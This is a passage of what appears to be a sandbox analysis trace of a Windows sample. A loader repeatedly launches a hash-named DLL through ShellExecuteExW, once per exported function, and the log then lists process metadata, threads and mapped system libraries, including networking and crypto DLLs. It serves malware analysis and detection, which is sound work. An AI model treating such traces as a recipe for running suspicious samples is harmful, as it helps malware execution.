lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0248.062] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0248.063] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0248.063] GetLastError () returned 0x0 [0248.063] SetLastError (dwErrCode=0x0) [0248.063] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0257.931] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0257.932] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0257.932] GetLastError () returned 0x0 [0257.932] SetLastError (dwErrCode=0x0) [0257.932] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0266.972] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0266.973] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0266.973] GetLastError () returned 0x0 [0266.973] SetLastError (dwErrCode=0x0) [0266.973] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0276.039] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0276.040] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0276.040] GetLastError () returned 0x0 [0276.040] SetLastError (dwErrCode=0x0) [0276.040] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0287.443] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0287.444] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0287.444] GetLastError () returned 0x0 [0287.444] SetLastError (dwErrCode=0x0) [0287.445] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0293.481] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0293.482] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0293.482] GetLastError () returned 0x0 [0293.483] SetLastError (dwErrCode=0x0) [0293.483] ShellExecuteExW (pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_destroy", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 2 os_tid = 0x674 Thread: id = 3 os_tid = 0x578 Thread: id = 4 os_tid = 0x580 Thread: id = 5 os_tid = 0x640 Thread: id = 6 os_tid = 0x68c Thread: id = 7 os_tid = 0x7ac Thread: id = 8 os_tid = 0x84c Thread: id = 10 os_tid = 0x1250 Thread: id = 13 os_tid = 0xe0c Thread: id = 16 os_tid = 0x13f8 Thread: id = 19 os_tid = 0xff8 Thread: id = 22 os_tid = 0x12a4 Thread: id = 25 os_tid = 0xe14 Thread: id = 28 os_tid = 0x60 Thread: id = 31 os_tid = 0x38c Thread: id = 34 os_tid = 0x428 Thread: id = 37 os_tid = 0xb48 Thread: id = 43 os_tid = 0x1160 Thread: id = 137 os_tid = 0x11c0 Thread: id = 140 os_tid = 0xf84 Thread: id = 173 os_tid = 0xe94 Thread: id = 178 os_tid = 0x1278 Thread: id = 181 os_tid = 0x178 Thread: id = 185 os_tid = 0xc8c Thread: id = 189 os_tid = 0x13f8 Thread: id = 193 os_tid = 0xc3c Thread: id = 198 os_tid = 0x1028 Thread: id = 203 os_tid = 0x1108 Thread: id = 207 os_tid = 0x12e8 Thread: id = 210 os_tid = 0xf30 Thread: id = 217 os_tid = 0xed0 Thread: id = 220 os_tid = 0xff4 Thread: id = 225 os_tid = 0xda4 Thread: id = 228 os_tid = 0x828 Thread: id = 231 os_tid = 0x12d8 Thread: id = 234 os_tid = 0xa80 Thread: id = 237 os_tid = 0xb90 Process: id = "2" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x4543b000" os_pid = "0x3c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 339 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 340 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 341 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 342 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 343 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 344 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 345 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 346 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 347 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 348 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 349 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 352 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 353 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 354 start_va = 0x540000 end_va = 0x5fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 355 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 356 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 357 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 358 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 359 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 360 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 361 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 362 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 363 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 364 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 365 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 366 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 367 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 368 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 369 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 370 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 371 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 372 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 373 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 374 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 375 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 376 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 377 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 378 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 379 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 380 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 381 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 382 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 383 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 384 start_va = 0x1a0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 385 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 386 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 387 start_va = 0x1e20000 end_va = 0x1edffff monitored = 0 entry_point = 0x1e40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 388 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 389 start_va = 0x1e20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 390 start_va = 0x1f20000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 391 start_va = 0x2120000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 392 start_va = 0x2520000 end_va = 0x2d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 393 start_va = 0x2d20000 end_va = 0x3ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 462 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 468 start_va = 0x3cf0000 end_va = 0x4026fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 505 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 506 start_va = 0x4030000 end_va = 0x42b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 507 start_va = 0x4030000 end_va = 0x4176fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 529 start_va = 0x4030000 end_va = 0x41f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 568 start_va = 0x4030000 end_va = 0x55bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 629 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 630 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 631 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 632 start_va = 0x4030000 end_va = 0x4200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 637 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 638 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 639 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 649 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 678 start_va = 0x4030000 end_va = 0x4188fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 697 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 699 start_va = 0x4030000 end_va = 0x410cfff monitored = 0 entry_point = 0x408e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 703 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 704 start_va = 0x4030000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 710 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 711 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 712 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1315 start_va = 0x4030000 end_va = 0x410cfff monitored = 0 entry_point = 0x408e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1316 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1385 start_va = 0x4030000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 1388 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1389 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1456 start_va = 0x7ffc4c110000 end_va = 0x7ffc4c121fff monitored = 0 entry_point = 0x7ffc4c111a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2458 start_va = 0x7ffc55c60000 end_va = 